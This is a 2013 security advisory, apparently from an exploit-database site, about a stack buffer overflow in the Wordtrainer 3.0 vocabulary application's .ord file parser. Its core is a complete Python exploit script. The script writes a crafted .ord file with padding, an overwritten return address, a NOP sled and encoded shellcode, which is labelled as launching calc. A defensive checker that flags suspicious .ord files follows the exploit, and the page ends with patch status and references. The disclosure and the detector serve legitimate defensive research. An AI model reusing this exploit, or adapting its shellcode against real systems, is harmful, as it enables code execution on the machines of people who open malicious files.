
Wordtrainer '.ord' File Buffer Overflow Vulnerability

Source: C4SS!0 G0M3S      Published: 2013-04-01 15:45:00

Wordtrainer is a vocabulary learning application.

Wordtrainer 3.0 contains a boundary error when parsing Glosexpert (*.ord) files, which can lead to a stack-based buffer overflow.

BUGTRAQ-ID: 47326

Affected systems:

Wordtrainer 3.07

Test method:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/usr/bin/python
#
#[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability
#[+]Date: 12\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe
#[+]Version: 3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#

from struct import pack
from time import sleep

print """
        Exploit Buffer Overflow Wordtrainer 3.0
        Created BY C4SS!0 G0M3S
        E-mail Louredo_@hotmail.com
        Site www.exploit-br.org

"""

buf = ("\x41" * 868)                 # filler up to the saved return address
buf += pack('<L', 0x00430363)        # value that overwrites the return address
buf += ("\x90" * 10)                 # NOP sled
buf += ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" #Shellcode WinExec("calc",0)
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca")
buf += "\x41" * (2000-len(buf))      # pad the entry to 2000 bytes in total

# .ord file header: "GLOSOR\r\n1\r\n\r\n \r\n", followed by the oversized entry
head = ("\x47\x4C\x4F\x53\x4F\x52\x0D\x0A\x31\x0D\x0A\x0D\x0A\x20\x0D\x0A")
head += (buf+"\r\n")

print "[+]Creating the Exploit File..."
sleep(1)
FILE = open("Exploit.ord","wb")
FILE.write(head)
FILE.close()
print "[+]File Created With Success\n"
sleep(2)
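While no vendor patch exists, a defender can at least screen .ord files before they are opened. The checker below is an added example, not part of the original advisory or of Wordtrainer; it assumes only the layout visible in the PoC above (a "GLOSOR" magic followed by CRLF-separated text lines) and flags files that contain a single overlong line or a run of control bytes, the two traits of the crafted file. The 512-byte bound and the control-byte threshold are assumptions chosen for illustration.

```python
# Triage checker for Glosexpert/Wordtrainer .ord files (added example, not
# vendor code). Assumed layout, taken from the PoC: "GLOSOR" magic, then
# CRLF-separated text lines. A legitimate vocabulary entry is a short line;
# the PoC needs one line of several hundred bytes to reach the return address.
from typing import List, Tuple

MAGIC = b"GLOSOR"
MAX_LINE = 512          # assumed safe bound per line (the PoC line is 2000 bytes)
MAX_CONTROL = 4         # assumed tolerance for stray control bytes in one line


def count_control_bytes(line: bytes) -> int:
    """Bytes below 0x20 other than TAB; machine code is full of them, text is not.
    Bytes above 0x7e are ignored on purpose so accented letters do not trigger."""
    return sum(1 for b in line if b < 0x20 and b != 0x09)


def triage_ord(data: bytes) -> Tuple[bool, List[str]]:
    """Return (suspicious, findings) for the raw bytes of an .ord file."""
    findings: List[str] = []
    if not data.startswith(MAGIC):
        findings.append("missing GLOSOR magic")
    for idx, line in enumerate(data.split(b"\r\n")):
        if len(line) > MAX_LINE:
            findings.append("line %d is %d bytes (> %d)" % (idx, len(line), MAX_LINE))
        ctl = count_control_bytes(line)
        if ctl > MAX_CONTROL:
            findings.append("line %d contains %d control bytes" % (idx, ctl))
    return (len(findings) > 0, findings)


def triage_file(path: str) -> Tuple[bool, List[str]]:
    with open(path, "rb") as fh:
        return triage_ord(fh.read())


# Constructed samples, not real files: a normal two-entry file and one whose
# fourth entry is a 920-byte blob with embedded control bytes.
BENIGN = b"GLOSOR\r\n1\r\n\r\n \r\nhouse;casa\r\ndog;cachorro\r\n"
OVERSIZED = (b"GLOSOR\r\n1\r\n\r\n \r\n"
             + b"A" * 900 + b"\x90" * 10 + b"\xcc" * 4
             + b"\x00\x01\x02\x03\x04\x05" + b"\r\n")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("oversized", OVERSIZED)):
        flagged, why = triage_ord(blob)
        print(name, "SUSPICIOUS" if flagged else "ok", why)
```

Run it over a directory of downloaded .ord files with triage_file() and quarantine anything flagged before the application ever parses it.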

Solution:

Vendor patch:

Wordtrainer

-----------

The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.wordtrainer.net/software/?lang=en&page=download

 

References:

http://osvdb.org/show/osvdb/74985

http://secunia.com/advisories/44101/